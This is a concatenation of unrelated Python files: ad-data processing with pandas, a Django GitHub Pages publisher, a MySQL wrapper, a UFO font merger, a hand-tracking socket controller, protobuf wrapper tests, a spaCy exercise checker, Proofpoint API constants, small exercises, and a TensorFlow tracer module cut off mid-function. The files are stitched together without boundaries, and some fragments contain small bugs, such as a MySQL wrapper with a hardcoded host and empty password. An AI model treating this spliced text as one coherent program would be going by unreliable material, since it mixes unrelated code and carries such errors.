opstatus.sort_index() train['charge_type'] = -1 train['target_type'] = -1 group = train.groupby('ad_id') new_train = pd.DataFrame() for g in group: ads = g[1] aid = ads['ad_id'].values[0] op = operate[operate['ad_id'] == aid] op.index = op['changeTime'] op.sort_index() targe_type = op['target_type'].values charge_type = op['charge_type'].values changeDay = op['changeDay'].values for i, item in enumerate(changeDay): mask = ads['day'] >= item print(item) ads.loc[mask, 'charge_type'] = targe_type[i] ads.loc[mask, 'target_type'] = targe_type[i] print(ads) new_train = pd.concat([new_train, ads]) new_train.to_csv('add_op_train.csv', index=False)100-1000 import logging import os from django.conf import settings from django.template import Template, Context from git import Repo from utils.mistune_markdown import article_markdown # from markdown import markdown logger = logging.getLogger('debug') class SyncGit: """ Git上传, 需要有对应setting里的项目目录, 且可以经过ssh上传github """ def __init__(self): self.repo = Repo(settings.GITHUB_PAGE_DIR) def sync(self, add_all=True, commit='add post', name='origin'): """ 同步文章到github page的仓库 """ if not settings.GITHUB_PAGE: return False, 'Do not enable GITHUB_PAGE' try: self.add(add_all) self.commit(commit) self.push(name) return True, 'Github page synced Successful' except Exception as e: logging.error(str(e)) return False, str(e) def 
add(self, add_all=True): self.repo.git.add(A=add_all) def commit(self, commit): self.repo.index.commit(commit) def push(self, name='origin'): self.repo.remote(name=name).push() template = """ {{ title }}

{{ h1_title }}

{{ motto }}

{% if display_title %}
{{ title }}
{% endif %}

{% if content %}
{{ content|safe }}
{% endif %}

{% if article_list %}
{% regroup article_list by add_time.year as year_list %}
<ul>
  {% for year in year_list %}
  <li>{{ year.grouper }} 年
    {% regroup year.list by add_time.month as month_list %}
    <ul>
      {% for month in month_list %}
      <li>{{ month.grouper }} 月</li>
      {% endfor %}
    </ul>
  </li>
  {% endfor %}
</ul>
{% endif %}
""" class HtmlRender: def __init__(self): self.blog_dir = settings.GITHUB_PAGE_DIR def index(self, blog_setting, article_list, link_list): """ 渲染首页的HTML, 也就是文章归档页 :param blog_setting 一些配置项 :param article_list 文章列表(需要按照时间有序) :param link_list 友情链接列表 """ if not settings.GITHUB_PAGE: return False, 'Do not enable GITHUB_PAGE' try: context = Context({ "title": blog_setting.name, "content": "文章归档页", "description": blog_setting.desc, "github_user": blog_setting.github_user, "github_avatar": blog_setting.github_avatar, "about_me": blog_setting.about_me, "article_list": article_list, "link_list": link_list, "h1_title": blog_setting.title, "motto": blog_setting.motto, }) with open(self.blog_dir + '/index.html', 'w', encoding='utf8') as ff: ff.write(Template(template).render(context)) return SyncGit().sync() except Exception as e: return False, str(e) def detail(self, blog_setting, article): """ 渲染文章详情页的HTML, FIXME: 更好的markdown渲染效果 :param blog_setting 一些配置项 :param article 文章 """ if not settings.GITHUB_PAGE: return False, 'Do not enable GITHUB_PAGE' if not article: return False, f'No match article: {article}' try: # 判断分类目录是否存在, 不存在则创建 if not os.path.isdir(self.blog_dir + '/' + article.category.name.strip()): os.mkdir(self.blog_dir + '/' + article.category.name.strip()) context = Context({ "display_title": True, "title": article.title, "description": article.title, "content": article_markdown(article.content), "github_user": blog_setting.github_user, "github_avatar": blog_setting.github_avatar, "about_me": blog_setting.about_me, # "category_tree": article.get_category_tree(), # "author": article.author, # "content": markdown(article.content, extensions=['extra', 'codehilite', 'tables', 'toc']) "h1_title": blog_setting.title, "motto": blog_setting.motto, }) file = self.blog_dir + '/' + article.category.name.strip() + '/' + article.title.strip() + '.html' with open(file, 'w', encoding='utf8') as f: return True, f.write(Template(template).render(context)) except Exception as e: return False, str(e) trentwangmeng/test0 #encoding=utf-8 # ============================== # MySQL封装 # ============================== import MySQLdb class mysqlPack: def __init__(self,conn=None): if conn == None: self.conn = MySQLdb.connect( host='172.16.17.32', user='hehe', port=3306, passwd='', db='yjyx', charset='utf8' ) else: self.conn = conn self.c=self.conn.cursor() #发送mysql命令 def send_mysql_command(self,str): self.c.execute(str) #读取一行 def read_mysql_oneline(self): return self.c.fetchone #读取全部行 def read_mysql_allline(self): return self.c.fetchall() #输出列表 def get_mysql_list(self): for i in range(self.c.rowcount): print(self.c.fetchone()) if __name__ == '__main__': passfrom fontFeatures import FontFeatures, Routine, Substitution from fontFeatures.feaLib import FeaParser from pathlib import Path import logging logger = logging.getLogger("ufomerge") logging.basicConfig(level=logging.INFO) def merge_ufos( ufo1, ufo2, glyphs=None, exclude_glyphs=None, codepoints=None, layout_handling="subset", existing_handling="replace", ): if glyphs is None: glyphs = [] glyphs = set(glyphs) if codepoints: cp2glyph = {} for g in ufo2: for u in g.unicodes: cp2glyph[u] = g.name glyphs |= set(cp2glyph[c] for c in codepoints if c in cp2glyph) if exclude_glyphs: glyphs = set(glyphs) - set(exclude_glyphs) # Check those glyphs actually are in UFO 2 not_there = glyphs - set(ufo2.keys()) if len(not_there): logger.warn("The following glyphs were not in UFO 2: %s" % ", ".join(not_there)) glyphs = glyphs - not_there if not glyphs: logger.info("No glyphs 
selected, nothing to do") exit(0) newglyphset = set(ufo1.keys()) | set(glyphs) # Handle layout subsetting here, in case closure is needed new_layout_rules = FontFeatures() if layout_handling == "ignore": pass else: path = getattr(ufo2, "_path", None) includeDir = Path(ufo2._path).parent if path else None ff = FeaParser(ufo2.features.text, includeDir=includeDir).parse() for routine in ff.routines: newroutine = Routine(name=routine.name, flags=routine.flags) for rule in routine.rules: if not isinstance(rule, Substitution): continue flat_outputs = [ item for sublist in rule.replacement for item in sublist ] true_inputs = [list(set(r) & newglyphset) for r in rule.input] rule.precontext = [list(set(r) & newglyphset) for r in rule.precontext] rule.postcontext = [ list(set(r) & newglyphset) for r in rule.postcontext ] if ( any(not g for g in true_inputs) or any(not g for g in rule.precontext) or any(not g for g in rule.postcontext) ): continue if layout_handling == "closure": # Any glyphs from "glyphs" substituted or generated by rules need to be added to the glyph set if not any(g in glyphs for g in rule.involved_glyphs): continue rule.input = true_inputs glyphs |= set(flat_outputs) else: # Any rules with new glyphs on the right hand side and glyphs # we have on the left hand side need to be copied into UFO1 if not any(g in glyphs for g in flat_outputs): continue if len(rule.input) == 1 and len(rule.replacement) == 1: # GSUB1 mapping = zip(rule.input[0], rule.replacement[0]) mapping = [(a,b) for a,b in mapping if a in newglyphset and b in newglyphset] if not mapping: continue rule.input[0] = [r[0] for r in mapping] rule.replacement[0] = [r[1] for r in mapping] else: rule.input = true_inputs rule.replacement = [list(set(r) & newglyphset) for r in rule.replacement] logging.debug("Adding rule '%s'", rule.asFea()) newroutine.rules.append(rule) if newroutine.rules: # Was it in a feature? add_to = [] for feature_name, routines in ff.features.items(): for routine_ref in routines: if routine_ref.routine == routine: add_to.append(feature_name) for feature_name in add_to: new_layout_rules.addFeature(feature_name, [newroutine]) # Kerning!! # # Create a list of flat kerning pairs for UFO 1 # ufo1_kerns = set() # for l,r in ufo1.kerning.keys(): # l = ufo1.groups.get(l,[l]) # r = ufo1.groups.get(r,[r]) # for lg in l: # for rg in r: # ufo1_kerns.add((lg,rg)) # Slim down the groups to only those in the glyph set for g in ufo2.groups.keys(): ufo2.groups[g] = [g for g in ufo2.groups[g] if g in glyphs] for (l, r), value in ufo2.kerning.items(): lg = ufo2.groups.get(l, [l]) rg = ufo2.groups.get(r, [r]) if not lg or not rg: continue if any(lglyph not in newglyphset for lglyph in lg) or any( rglyph not in newglyphset for rglyph in rg ): continue # Just add for now. 
We should get fancy later ufo1.kerning[(l, r)] = value if l.startswith("public.kern"): if l not in ufo1.groups: ufo1.groups[l] = ufo2.groups[l] else: ufo1.groups[l] = list(set(ufo1.groups[l] + ufo2.groups[l])) if r.startswith("public.kern"): if r not in ufo1.groups: ufo1.groups[r] = ufo2.groups[r] else: ufo1.groups[r] = list(set(ufo1.groups[r] + ufo2.groups[r])) # Routines for merging font lib keys def merge_set(ufo1, ufo2, name, g, create_if_not_in_ufo1=False): if name not in ufo2.lib or g not in ufo2.lib[name]: return if name not in ufo1.lib: if create_if_not_in_ufo1: ufo1.lib[name] = [] else: return if g not in ufo1.lib[name]: ufo1.lib[name].append(g) def merge_dict(ufo1, ufo2, name, g, create_if_not_in_ufo1=False): if name not in ufo2.lib or g not in ufo2.lib[name]: return if name not in ufo1.lib: if create_if_not_in_ufo1: ufo1.lib[name] = {} else: return ufo1.lib[name][g] = ufo2.lib[name][g] # Check the glyphs for components def close_components(glyphs, g): if not ufo2[g].components: return for comp in ufo2[g].components: if comp.baseGlyph not in newglyphset: # Well, this is the easy case glyphs.add(comp.baseGlyph) close_components(glyphs, comp.baseGlyph) elif existing_handling == "replace": # Also not a problem glyphs.add(comp.baseGlyph) close_components(glyphs, comp.baseGlyph) elif comp.baseGlyph in ufo1: # Oh bother. logger.warning( f"New glyph {g} used component {comp.baseGlyph} which already exists in font; not replacing it, as you have not specified --replace-existing" ) for g in list(glyphs): # list() avoids "Set changed size during iteration" error close_components(glyphs, g) # Now do the add for g in glyphs: if existing_handling == "skip" and g in ufo1: logger.info("Skipping glyph '%s' already present in target file" % g) continue merge_set(ufo1, ufo2, "public.glyphOrder", g, create_if_not_in_ufo1=False) merge_set(ufo1, ufo2, "public.skipExportGlyphs", g, create_if_not_in_ufo1=True) merge_dict(ufo1, ufo2, "public.postscriptNames", g, create_if_not_in_ufo1=True) merge_dict( ufo1, ufo2, "public.openTypeCategories", g, create_if_not_in_ufo1=True ) if g in ufo1: ufo1[g] = ufo2[g] else: ufo1.addGlyph(ufo2[g]) if new_layout_rules.routines: ufo1.features.text += new_layout_rules.asFea(do_gdef=False) import cv2 import socket from time import sleep from handController import HandTrackingModule as htm def sendSocket(status): HOST = "192.168.1.78" # Esp Internal IP PORT = 9999 # Port Used with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: s.connect((HOST, PORT)) if status == True: s.sendall(b'1') sleep(0.05) if status == False: s.sendall(b'0') sleep(0.05) def startHandTracking(): wCam, hCam = 640, 480 cap = cv2.VideoCapture(0) cap.set(3, wCam) cap.set(4, hCam) detector = htm.handDetector(detectionCon=0.75) status = False while True: success, img = cap.read() img = detector.findHands(img, draw = False) tipsIDs = [8, 12, 16, 20] firstTime = True lmList = detector.findPosition(img, draw = False) if len(lmList) != 0: fingers = [] for id in range(0, 4): if lmList[tipsIDs[id]][2] < lmList[tipsIDs[id] - 2][2]: fingers.append(1) else: fingers.append(0) totalFingers = fingers.count(1) if totalFingers == 4 and status == True: print("Enviar Request de Desligar") sendSocket(status) status = False elif totalFingers == 0 and status == False: print("Enviar Request para Ligar") sendSocket(status) status = True else: pass #sleep(1) cv2.imshow("Image", img) cv2.waitKey(1) def main(): startHandTracking() if __name__ == "__main__": main() #Project by rafawastaken # Copyright 2018 Google LLC # # 
Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import collections from google.protobuf import descriptor_pb2 from gapic.schema import wrappers def test_signature_dispatch_field(): T = descriptor_pb2.FieldDescriptorProto.Type fields = collections.OrderedDict(( ('foo', make_field(name='foo', type=T.Value('TYPE_INT32'))), ('bar', make_field(name='bar', type=T.Value('TYPE_BOOL'))), )) signature = wrappers.MethodSignature(name='spam', fields=fields) assert signature.dispatch_field == fields['foo'] def test_signatures_magic_methods(): T = descriptor_pb2.FieldDescriptorProto.Type fields = collections.OrderedDict(( ('foo', make_field(name='foo', type=T.Value('TYPE_INT32'))), ('bar', make_field(name='bar', type=T.Value('TYPE_BOOL'))), )) signatures = wrappers.MethodSignatures(all=( wrappers.MethodSignature(name='spam', fields=fields), wrappers.MethodSignature(name='eggs', fields={ 'foo': fields['foo'], }), )) assert len(signatures) == 2 assert tuple([i for i in signatures]) == signatures.all assert signatures[0] == signatures.all[0] def test_signatures_single_dispatch(): T = descriptor_pb2.FieldDescriptorProto.Type fields = ( ('foo', make_field( message=wrappers.MessageType( fields={}, message_pb=descriptor_pb2.DescriptorProto(name='Bacon'), ), name='bar', type=T.Value('TYPE_MESSAGE'), type_name='bogus.Message', )), ('bar', make_field(name='foo', type=T.Value('TYPE_INT32'))), ) signatures = wrappers.MethodSignatures(all=( wrappers.MethodSignature( name='spam', fields=collections.OrderedDict(fields), ), wrappers.MethodSignature( name='eggs', fields=collections.OrderedDict(reversed(fields)), ), )) assert len(signatures) == 2 assert len(signatures.single_dispatch) == 1 assert signatures.single_dispatch[0] == signatures[1] def make_field(*, message=None, enum=None, **kwargs) -> wrappers.Field: kwargs.setdefault('name', 'my_field') kwargs.setdefault('number', 1) kwargs.setdefault('type', descriptor_pb2.FieldDescriptorProto.Type.Value('TYPE_BOOL'), ) field_pb = descriptor_pb2.FieldDescriptorProto(**kwargs) return wrappers.Field(field_pb=field_pb, message=message, enum=enum) Jette16/spacy-course def test(): import spacy.matcher assert isinstance( matcher, spacy.matcher.Matcher ), "Você está inicializando o Comparador corretamente?" assert ( "Matcher(nlp.vocab)" in __solution__ ), "Você está inicializando o Comparador corretamente com o vocabulário compartilhado?" assert ( len(pattern) == 2 ), "A expressão deve descrever dois tokens (dois dicionários)." assert isinstance(pattern[0], dict) and isinstance( pattern[1], dict ), "Cada item da expressão deve conter um dicionário." assert ( len(pattern[0]) == 1 and len(pattern[1]) == 1 ), "Cada item na expressão deve conter apenas uma chave." assert any( pattern[0].get(key) == "iPhone" for key in ["text", "TEXT"] ), "Você está fazendo a comparação com o texto do token?" assert any( pattern[1].get(key) == "X" for key in ["text", "TEXT"] ), "Você está fazendo a comparação com o texto do token?" 
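    # Not part of the original exercise: a minimal sketch of the solution these
    # assertions appear to expect. Names such as `nlp`, `doc`, and `__solution__`
    # come from the course environment, and the exact `matcher.add` signature
    # depends on the spaCy version in use, so treat this as an illustration only:
    #
    #   from spacy.matcher import Matcher
    #   matcher = Matcher(nlp.vocab)
    #   pattern = [{"TEXT": "iPhone"}, {"TEXT": "X"}]
    #   matcher.add("IPHONE_X_PATTERN", [pattern])
    #   matches = matcher(doc)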
assert ( 'matcher.add("IPHONE_X_PATTERN"' in __solution__ ), "Você está adicionando a expressão corretamente?" assert ( "matches = matcher(doc)" in __solution__ ), "Você está chamando o Comparador passando o doc como parâmetro?" __msg__.good( "Parabéns! Você identificou uma correspondência com sucesso: dois tokens " "em doc[1:3] que correspondem a partição 'iPhone X'. " ) # File: proofpoint_consts.py # Copyright (c) 2017-2020 Splunk Inc. # # Licensed under Apache 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) # PP_API_BASE_URL = "https://tap-api-v2.proofpoint.com" PP_API_PATH_CLICKS_BLOCKED = "/v2/siem/clicks/blocked" PP_API_PATH_CLICKS_PERMITTED = "/v2/siem/clicks/permitted" PP_API_PATH_MESSAGES_BLOCKED = "/v2/siem/messages/blocked" PP_API_PATH_MESSAGES_DELIVERED = "/v2/siem/messages/delivered" PP_API_PATH_ISSUES = "/v2/siem/issues" PP_API_PATH_ALL = "/v2/siem/all" PP_API_PATH_CAMPAIGN = "/v2/campaign/{}" PP_API_PATH_FORENSICS = "/v2/forensics" PP_API_PATH_DECODE = "/v2/url/decode" # Constants relating to 'get_error_message_from_exception' ERR_CODE_MSG = "Error code unavailable" ERR_MSG_UNAVAILABLE = "Error message unavailable. Please check the asset configuration and|or action parameters" PARSE_ERR_MSG = "Unable to parse the error message. Please check the asset configuration and|or action parameters" TYPE_ERR_MSG = "Error occurred while connecting to the Proofpoint TAP Server. Please check the asset configuration and|or action parameters." ERR_MSG_FORMAT_WITH_CODE = "Error Code: {}. Error Message: {}" ERR_MSG_FORMAT_WITHOUT_CODE = "Error Message: {}" # Constants relating to 'validate_integer' INVALID_INTEGER_ERR_MSG = "Please provide a valid integer value in the {}" INVALID_NON_NEGATIVE_INTEGER_ERR_MSG = "Please provide a valid non-negative integer value in the {}" INITIAL_INGESTION_WINDOW_KEY = "'initial_ingestion_window' configuration parameter" # Constant relating to 'handle_py_ver_compat_for_input_str' PY_2TO3_ERR_MSG = "Error occurred while handling python 2to3 compatibility for the input string" # Constant relating to fetching the python major version ERR_FETCHING_PYTHON_VERSION = "Error occurred while fetching the Phantom server's Python major version" # Constants relating to error messages while processing response from server EMPTY_RESPONSE_MSG = "Status code: {}. Empty response and no information in the header" HTML_RESPONSE_PARSE_ERR_MSG = "Cannot parse error details" JSON_PARSE_ERR_MSG = 'Unable to parse JSON response. Error: {}' SERVER_ERR_MSG = 'Error from server. Status Code: {} Data from server: {}' SERVER_ERR_CANT_PROCESS_RESPONSE_MSG = "Can't process response from server. Status Code: {} Data from server: {}" CONNECTION_REFUSED_ERR_MSG = "Error Details: Connection Refused from the Server" SERVER_CONNECTION_ERR_MSG = "Error Connecting to server. 
Details: {}"


def computepay(hours, rate):
    # Hours over 40 switch the whole paycheck to the 1.5x overtime rate.
    # (This keeps the original logic; the fix is using the `rate` parameter
    # instead of the undefined global `hourly_rate`.)
    if hours > 40:
        new_rate = 1.5 * rate
        gross_pay = hours * new_rate
    else:
        gross_pay = hours * rate
    print("pay is:", gross_pay)


try:
    hours = int(input("enter hours worked"))
    hourly_rate = float(input("enter the rate"))
except ValueError:
    print("enter numeric input")
    exit()

computepay(hours, hourly_rate)
"""
@author: acfromspace
"""


class Queue:
    def __init__(self):
        self.items = []

    def is_empty(self):
        return print("is_empty():", self.items == [])

    def enqueue(self, item):
        print("enqueue():", item)
        self.items.insert(0, item)

    def dequeue(self):
        return print("dequeue():", self.items.pop())

    def size(self):
        return print("size():", len(self.items))

    def showcase(self):
        return print("showcase():", self.items)


queue = Queue()
queue.is_empty()
queue.showcase()
queue.enqueue('hello')
queue.showcase()
queue.enqueue('dog')
queue.showcase()
queue.enqueue(5)
queue.showcase()
queue.size()
queue.showcase()
queue.dequeue()
queue.showcase()

"""
Output:
is_empty(): True
showcase(): []
enqueue(): hello
showcase(): ['hello']
enqueue(): dog
showcase(): ['dog', 'hello']
enqueue(): 5
showcase(): [5, 'dog', 'hello']
size(): 3
showcase(): [5, 'dog', 'hello']
dequeue(): hello
showcase(): [5, 'dog']
"""
10-100
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ========================================================================
"""Tensor Tracer report generation utilities."""

from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

import collections
import os

from tensorflow.python.platform import gfile
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.tpu import tensor_tracer_pb2

_TRACER_LOG_PREFIX = ' [>>>TT>>>]'
_MARKER_SECTION_BEGIN = '!!!!!!! section-begin:'
_MARKER_SECTION_END = '!!!!!!! section-end:'
_SECTION_NAME_CONFIG = 'configuration'
_SECTION_NAME_REASON = 'reason'
_SECTION_NAME_OP_LIST = 'op-list'
_SECTION_NAME_TENSOR_LIST = 'tensor-list'
_SECTION_NAME_CACHE_INDEX_MAP = 'cache-index-map'
_SECTION_NAME_GRAPH = 'graph'
_SECTION_NAME_TENSOR_TRACER_CHECKPOINT = 'tensor_tracer_checkpoint'
_FIELD_NAME_VERSION = 'version:'
_FIELD_NAME_DEVICE = 'device:'
_FIELD_NAME_TRACE_MODE = 'trace-mode:'
_FIELD_NAME_SUBMODE = 'submode:'
_FIELD_NAME_NUM_REPLICAS = 'num-replicas:'
_FIELD_NAME_NUM_REPLICAS_PER_HOST = 'num-replicas-per-host:'
_FIELD_NAME_NUM_HOSTS = 'num-hosts:'
_FIELD_NAME_NUM_OPS = 'number-of-ops:'
_FIELD_NAME_NUM_TENSORS = 'number-of-tensors:'
_FIELD_NAME_NUM_CACHE_INDICES = 'number-of-indices:'
_FIELD_NAME_TOPOLOGICAL_SORT_SUCCEED = 'topological-sort-succeed:'
_CURRENT_VERSION = 'use-outside-compilation'
_TT_REPORT_PROTO = 'tensor_tracer_report.report_pb'


def topological_sort(g):
  """Performs topological sort on the given graph.

  Args:
     g: the graph.
Returns: A pair where the first element indicates if the topological sort succeeded (True if there is no cycle found; False if a cycle is found) and the second element is either the sorted list of nodes or the cycle of nodes found. """ def _is_loop_edge(op): """Returns true if the op is the end of a while-loop creating a cycle.""" return op.type in ['NextIteration'] def _in_op_degree(op): """Returns the number of incoming edges to the given op. The edge calculation skips the edges that come from 'NextIteration' ops. NextIteration creates a cycle in the graph. We break cycles by treating this op as 'sink' and ignoring all outgoing edges from it. Args: op: Tf.Operation Returns: the number of incoming edges. """ count = 0 for op in op.control_inputs + [in_tensor.op for in_tensor in op.inputs]: if not _is_loop_edge(op): count += 1 return count sorted_ops = [] op_in_degree = {op: _in_op_degree(op) for op in g.get_operations()} frontier = [op for (op, degree) in op_in_degree.items() if degree == 0] frontier.sort(key=lambda op: op.name) while frontier: op = frontier.pop() # Remove the op from graph, and remove its outgoing edges. sorted_ops.append(op) if _is_loop_edge(op): continue # pylint: disable=protected-access consumers = list(op._control_outputs) # pylint: enable=protected-access for out_tensor in op.outputs: consumers += [consumer_op for consumer_op in out_tensor.consumers()] consumers.sort(key=lambda op: op.name) for consumer in consumers: # For each deleted edge shift the bucket of the vertex. op_in_degree[consumer] -= 1 if op_in_degree[consumer] == 0: frontier.append(consumer) if op_in_degree[consumer] < 0: raise ValueError('consumer:%s degree mismatch'%consumer.name) left_ops = set([op for (op, degree) in op_in_degree.items() if degree > 0]) if left_ops: return (True, left_ops) else: assert len(g.get_operations()) == len(sorted_ops) return (False, sorted_ops) class TensorTracerConfig(object): """Tensor Tracer config object.""" def __init__(self): self.version = _CURRENT_VERSION self.device_type = None self.num_replicas = None self.num_replicas_per_host = None self.num_hosts = None class TensorTraceOrder(object): """Class that is responsible from storing the trace-id of the tensors.""" def __init__(self, graph_order, traced_tensors): self.graph_order = graph_order self.traced_tensors = traced_tensors self._create_tensor_maps() def _create_tensor_maps(self): """Creates tensor to cache id maps.""" self.tensorname_to_cache_idx = {} self.cache_idx_to_tensor_idx = [] for out_tensor in self.traced_tensors: tensor_name = out_tensor.name if tensor_name in self.tensorname_to_cache_idx: raise ValueError( 'Tensor name %s should not be already in ' 'tensorname_to_cache_idx'%tensor_name) if tensor_name not in self.graph_order.tensor_to_idx: raise ValueError( 'Tensor name %s is not in the tensor_to_idx'%tensor_name) tensor_idx = self.graph_order.tensor_to_idx[tensor_name] cache_idx = len(self.tensorname_to_cache_idx) self.tensorname_to_cache_idx[tensor_name] = cache_idx self.cache_idx_to_tensor_idx.append(tensor_idx) if len(self.tensorname_to_cache_idx) != len( self.cache_idx_to_tensor_idx): raise RuntimeError('len(self.tensorname_to_cache_idx) != ' 'len(self.cache_idx_to_tensor_idx') def sort_tensors_and_ops(graph): """Returns a wrapper that has consistent tensor and op orders.""" graph_wrapper = collections.namedtuple('GraphWrapper', ['graph', 'operations', 'op_to_idx', 'tensors', 'tensor_to_idx', 'contains_cycle', 'topological_order_or_cycle']) contains_cycle, topological_order_or_cycle = 
topological_sort(graph) if not contains_cycle: operations = topological_order_or_cycle else: operations = graph.get_operations() op_to_idx = {op.name: index for index, op in enumerate(operations)} tensors = [] for op in operations: tensors.extend(op.outputs) tensor_to_idx = {tensor.name: index for index, tensor in enumerate(tensors)} return graph_wrapper(graph=graph, operations=operations, op_to_idx=op_to_idx, tensors=tensors, tensor_to_idx=tensor_to_idx, contains_cycle=contains_cycle, topological_order_or_cycle=topological_order_or_cycle) class OpenReportFile(object): """Context manager for writing report file.""" def __init__(self, tt_parameters): if not tt_parameters.report_file_path: self._report_file = None return try: self._report_file = gfile.Open(tt_parameters.report_file_path, 'w') except IOError as e: raise e def __enter__(self): return self._report_file def __exit__(self, unused_type, unused_value, unused_traceback): if self._report_file: self._report_file.close() class TTReportHandle(object): """Utility class responsible from creating a tensor tracer report.""" def __init__(self): self.instrument_records = {} self._report_file = None def instrument(self, name, explanation): self.instrument_records[name] = explanation def instrument_op(self, op, explanation): self.instrument(op.name, explanation) def instrument_tensor(self, tensor, explanation): self.instrument(tensor.name, explanation) def create_report_proto(self, tt_config, tt_parameters, tensor_trace_order, tensor_trace_points, collected_signature_types): """Creates and returns a proto that stores tensor tracer configuration. Args: tt_config: TensorTracerConfig object holding information about the run environment (device, # cores, # hosts), and tensor tracer version information. tt_parameters: TTParameters objects storing the user provided parameters for tensor tracer. tensor_trace_order: TensorTraceOrder object storing a topological order of the graph. tensor_trace_points: Progromatically added trace_points/checkpoints. collected_signature_types: The signature types collected, e,g, norm, max, min, mean... Returns: TensorTracerReport proto. 
""" report = tensor_tracer_pb2.TensorTracerReport() report.config.version = tt_config.version report.config.device = tt_config.device_type report.config.num_cores = tt_config.num_replicas report.config.num_hosts = tt_config.num_hosts report.config.num_cores_per_host = tt_config.num_replicas_per_host for core in tt_parameters.included_cores: report.config.included_cores.append(core) report.config.submode = tt_parameters.submode report.config.trace_mode = tt_parameters.trace_mode for signature_name, _ in sorted(collected_signature_types.items(), key=lambda x: x[1]): report.config.signatures.append(signature_name) tf_graph = tensor_trace_order.graph_order.graph report.graphdef.CopyFrom(tf_graph.as_graph_def()) for tensor in tensor_trace_order.graph_order.tensors: tensor_def = tensor_tracer_pb2.TensorTracerReport.TracedTensorDef() tensor_def.name = tensor.name if tensor.name in tensor_trace_order.tensorname_to_cache_idx: tensor_def.is_traced = True tensor_def.cache_index = ( tensor_trace_order.tensorname_to_cache_idx[tensor.name]) else: tensor_def.is_traced = False if tensor.name in tensor_trace_points: tensor_def.trace_point_name = tensor_trace_points[tensor.name] if tensor.name in self.instrument_records: tensor_def.explanation = self.instrument_records[tensor.name] elif tensor.op.name in self.instrument_records: tensor_def.explanation = self.instrument_records[tensor.op.name] report.tensordef[tensor.name].CopyFrom(tensor_def) return report def write_report_proto(self, report_proto, tt_parameters): """Writes the given report proto under trace_dir.""" gfile.MakeDirs(tt_parameters.trace_dir) report_path = os.path.join(tt_parameters.trace_dir, _TT_REPORT_PROTO) with gfile.GFile(report_path, 'wb') as f: f.write(report_proto.SerializeToString()) def create_report(self, tt_config, tt_parameters, tensor_trace_order, tensor_trace_points): """Creates a report file and writes the trace information.""" with OpenReportFile(tt_parameters) as self._report_file: self._write_config_section(tt_config, tt_parameters) self._write_op_list_section(tensor_trace_order.graph_order) self._write_tensor_list_section(tensor_trace_order.graph_order) self._write_trace_points(tensor_trace_points) self._write_cache_index_map_section(tensor_trace_order) self._write_reason_section() self._write_graph_section(tensor_trace_order.graph_order) def _write_trace_points(self, tensor_trace_points): """Writes the list of checkpoints.""" self._write_report('%s %s\n'%(_MARKER_SECTION_BEGIN, _SECTION_NAME_TENSOR_TRACER_CHECKPOINT)) for (tensor, checkpoint_name) in tensor_trace_points: self._write_report('%s %s\n'%(tensor.name, checkpoint_name)) self._write_report('%s %s\n'%(_MARKER_SECTION_END, _SECTION_NAME_TENSOR_TRACER_CHECKPOINT)) def _write_report(self, content): """Writes the given content to the report.""" line = '%s %s'%(_TRACER_LOG_PREFIX, content) if self._report_file: self._report_file.write(line) else: logging.info(line) def _write_config_section(self, tt_config, tt_parameters): """Writes the config section of the report.""" self._write_report('%s %s\n'%(_MARKER_SECTION_BEGIN, _SECTION_NAME_CONFIG)) self._write_report('%s %s\n'%(_FIELD_NAME_VERSION, tt_config.version)) self._write_report('%s %s\n'%(_FIELD_NAME_DEVICE, tt_config.device_type)) self._write_report('%s %s\n'%(_FIELD_NAME_TRACE_MODE, tt_parameters.trace_mode)) self._write_report('%s %s\n'%(_FIELD_NAME_SUBMODE, tt_parameters.submode)) if tt_parameters.included_cores: self._write_report('%s %s\n'%(_FIELD_NAME_NUM_REPLICAS, len(tt_parameters.included_cores))) else: 
self._write_report('%s %s\n'%(_FIELD_NAME_NUM_REPLICAS, tt_config.num_replicas)) self._write_report('%s %s\n'%(_FIELD_NAME_NUM_REPLICAS_PER_HOST, tt_config.num_replicas_per_host)) self._write_report('%s %s\n'%(_FIELD_NAME_NUM_HOSTS, tt_config.num_hosts)) self._write_report('%s %s\n'%(_MARKER_SECTION_END, _SECTION_NAME_CONFIG)) def _write_reason_section(self): """Writes the reason section of the report.""" self._write_report('%s %s\n'%(_MARKER_SECTION_BEGIN, _SECTION_NAME_REASON)) for key in sorted(self.instrument_records): self._write_report('"%s" %s\n'%(key, self.instrument_records[key])) self._write_report('%s %s\n'%(_MARKER_SECTION_END, _SECTION_NAME_REASON)) def _write_op_list_section(self, graph_order): """Writes the Op-list section of the report.""" self._write_report('%s %s\n'%(_MARKER_SECTION_BEGIN, _SECTION_NAME_OP_LIST)) self._write_report('%s %d\n'%(_FIELD_NAME_NUM_OPS, len(graph_order.operations))) for i in range(0, len(graph_order.operations)): op = graph_order.operations[i] line = '%d "%s" %s'%(i, op.name, op.type) for out_tensor in op.outputs: if out_tensor.name not in graph_order.tensor_to_idx: raise ValueError( 'out_tensor %s is not in tensor_to_idx'%out_tensor.name) line += ' %d'%graph_order.tensor_to_idx[out_tensor.name] line += '\n' self._write_report(line) self._write_report('%s %s\n'%(_MARKER_SECTION_END, _SECTION_NAME_OP_LIST)) def _write_tensor_list_section(self, graph_order): """Writes the tensor-list section of the report.""" self._write_report('%s %s\n'%(_MARKER_SECTION_BEGIN, _SECTION_NAME_TENSOR_LIST)) self._write_report('%s %d\n'%(_FIELD_NAME_NUM_TENSORS, len(graph_order.tensors))) for i in range(0, len(graph_order.tensors)): tensor = graph_order.tensors[i] line = '%d "%s"'%(i, tensor.name) consumers = tensor.consumers() consumers.sort(key=lambda op: op.name) for consumer_op in consumers: if consumer_op.name not in graph_order.op_to_idx: raise 